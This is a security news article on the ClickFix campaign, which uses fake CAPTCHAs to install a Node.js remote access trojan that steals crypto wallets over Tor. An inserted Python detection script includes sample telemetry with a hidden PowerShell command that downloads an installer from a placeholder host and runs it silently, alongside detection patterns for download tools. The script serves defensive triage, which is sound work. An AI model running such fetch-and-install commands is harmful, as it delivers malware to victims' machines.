Behind the CAPTCHA: How ClickFix Scammers Are Using Node.js and Tor to Drain Crypto Wallets
A new wave of malware hides behind everyday CAPTCHAs, targeting unsuspecting Windows users and their digital assets.
It happens in a split second: you click a CAPTCHA box to prove you’re human, and in that instant, your computer becomes a target. What you don’t see is the digital ambush unfolding behind the scenes - a sophisticated cybercrime operation that’s quietly stealing cryptocurrency from victims around the globe. Welcome to the world of ClickFix, a new breed of malware campaign that’s as professional as it is insidious.
Fast Facts
- ClickFix attacks start with a fake CAPTCHA that triggers malware installation on Windows PCs.
- The malware is a Remote Access Trojan (RAT) built with Node.js and delivered via the Tor network.
- Malware modules are loaded dynamically into memory, making detection extremely difficult.
- The campaign operates as a Malware-as-a-Service (MaaS), rented out to cybercriminal affiliates.
- Researchers uncovered the backend after hackers exposed their admin panel due to an OPSEC mistake.
The Anatomy of a ClickFix Attack
This new scam starts with a simple deception: a counterfeit CAPTCHA prompt. Instead of verifying your humanity, a hidden PowerShell command silently downloads a malicious installer - NodeServer-Setup-Full.msi - from a remote server. The payload? A Remote Access Trojan with its own Node.js engine, designed to run seamlessly on any Windows machine.
Once inside, the malware immediately cloaks itself using the Tor network, hiding its communications from prying eyes. It burrows into a folder named “LogicOptimizer,” modifies the Windows Registry for persistence, and then goes dark - waiting for the right moment to strike.
What makes ClickFix particularly dangerous is its modular design. The most potent components are never written to disk; instead, they’re fetched on demand from the attackers’ server and run in memory only. This “fileless” approach allows the malware to evade most antivirus tools, leaving even vigilant users exposed.
Before launching its attack, ClickFix carefully scans the host system - checking Windows versions, CPU type, available memory, and even hunting for over 30 security products. If the system looks too well-defended, the malware stays dormant, minimizing the risk of discovery.
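The first stage described above leaves a few host-level traces a defender can key on: a PowerShell process started with a hidden window that downloads and runs an .msi, the NodeServer-Setup-Full.msi name, and a Run-key entry pointing into a "LogicOptimizer" folder. The script below is an added example, not Netskope's tooling or code from the article; it runs those indicators over a handful of constructed telemetry events whose field names only loosely follow Sysmon process-creation and registry events. The rule that flags node.exe executing from the LogicOptimizer folder is an assumption about how the RAT's bundled Node.js engine shows up in process telemetry; the page does not state that detail.

```python
"""
Triage helper for the ClickFix chain described above.

Added example (not Netskope's tooling or the article's own code). It runs the
page's indicators over constructed Windows telemetry events: a hidden
PowerShell download of an .msi, the NodeServer-Setup-Full.msi name, a Run-key
entry pointing into a "LogicOptimizer" folder and (assumption, not stated on
the page) node.exe executing out of that folder.
"""
import re
from dataclasses import dataclass

# Indicators taken from the write-up above.
INSTALLER_NAME = "NodeServer-Setup-Full.msi"
PERSISTENCE_DIR = "LogicOptimizer"

HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
DOWNLOAD_VERB = re.compile(
    r"\b(?:iwr|invoke-webrequest|downloadfile|downloadstring|curl|wget)\b",
    re.IGNORECASE,
)
MSI_REF = re.compile(r"\.msi\b", re.IGNORECASE)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(?:Once)?(?:\\|$)", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    rule: str
    event_index: int
    detail: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process(i: int, ev: dict) -> list:
    """Rules for a process-creation event (image, parent, cmdline)."""
    out = []
    image = _basename(ev.get("image", ""))
    cmd = ev.get("cmdline", "")
    if image in ("powershell.exe", "pwsh.exe"):
        # Exact installer name from the article: precise but trivially renamed.
        if INSTALLER_NAME.lower() in cmd.lower():
            out.append(Finding("known_installer_name", i, INSTALLER_NAME))
        # Behavioural rule: hidden window + download cmdlet + .msi reference.
        if HIDDEN_WINDOW.search(cmd) and DOWNLOAD_VERB.search(cmd) and MSI_REF.search(cmd):
            out.append(Finding("hidden_powershell_msi_download", i, cmd[:60]))
    # Assumption: the RAT's Node.js engine runs as node.exe from its folder.
    if image == "node.exe" and PERSISTENCE_DIR.lower() in ev.get("image", "").lower():
        out.append(Finding("node_from_persistence_dir", i, ev["image"]))
    return out


def check_registry(i: int, ev: dict) -> list:
    """Rules for a registry value-set event (key, value)."""
    key, value = ev.get("key", ""), ev.get("value", "")
    if RUN_KEY.search(key) and PERSISTENCE_DIR.lower() in value.lower():
        return [Finding("run_key_persistence", i, key)]
    return []


def scan(events: list) -> list:
    """Apply every rule to every event; returns all findings in event order."""
    findings = []
    for i, ev in enumerate(events):
        if ev.get("type") == "process":
            findings.extend(check_process(i, ev))
        elif ev.get("type") == "registry":
            findings.extend(check_registry(i, ev))
    return findings


# Constructed sample telemetry; the download host is a placeholder, the
# article does not name the server.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\explorer.exe",
     "parent": r"C:\Windows\System32\userinit.exe", "cmdline": "explorer.exe"},
    {"type": "process", "image": PS, "parent": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://PLACEHOLDER.invalid/'
                'NodeServer-Setup-Full.msi -OutFile $env:TEMP\\s.msi; '
                'msiexec /i $env:TEMP\\s.msi /qn"'},
    {"type": "registry",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\LogicOptimizer",
     "value": r"C:\Users\victim\AppData\Roaming\LogicOptimizer\node.exe"},
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\victim\AppData\Roaming\LogicOptimizer\node.exe",
     "cmdline": "node.exe main.js"},
    # Benign PowerShell: no hidden window, no download.
    {"type": "process", "image": PS, "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "powershell -NoProfile Get-Process"},
    # Hidden window alone (common in admin scripts) must not fire.
    {"type": "process", "image": PS, "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "powershell -w hidden Get-Date"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.rule}] event #{f.event_index}: {f.detail}")
```

The filename and folder matches are the easiest for an affiliate to change, so the behavioural rule (hidden window plus a download verb plus an .msi reference in one PowerShell command line) is the one worth keeping in a real detection; the two benign events show why "hidden window" on its own is too noisy. Because the later modules run only in memory, this first stage and the Run-key write are where endpoint telemetry still has something on disk to match.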
A Crime Factory in the Shadows
This is no amateur operation. ClickFix is run as Malware-as-a-Service, where criminal clients rent the toolkit to launch their own campaigns. The infrastructure uses gRPC protocols for real-time control and monitoring, with Tor-based channels feeding stolen wallet data and success notifications directly to scammers’ Telegram groups.
Researchers at Netskope Threat Labs were able to map the backend thanks to a rare operational blunder: the attackers left their admin panel exposed. Files like support.proto and admin.proto revealed how the system works, exposing the professionalism - and scale - of the operation.
Conclusion: Stay Paranoid, Stay Safe
ClickFix is a chilling reminder that even the most routine online interactions can hide advanced threats. As criminals become more sophisticated, users must become more cautious. If that CAPTCHA box looks even a bit suspicious, don’t click - your crypto wallet may depend on it.
WIKICROOK
- Remote Access Trojan (RAT): A Remote Access Trojan (RAT) is malware that lets attackers secretly control a victim’s computer from anywhere, enabling theft and spying.
- Node.js: Node.js is a platform for running JavaScript outside browsers, often on servers. Attackers can also ship it alongside malicious JavaScript so their code runs on a victim’s machine, as the ClickFix RAT does.
- Tor Network: The Tor network is a privacy tool that routes internet traffic through several servers, making it hard to trace users’ identities or online actions.
- Malware: Malware is malicious software designed to infiltrate, damage, or steal data from computing devices without the user’s consent.
- gRPC: gRPC is a high-performance protocol for secure, efficient communication between services, often used in microservices and cloud-native architectures.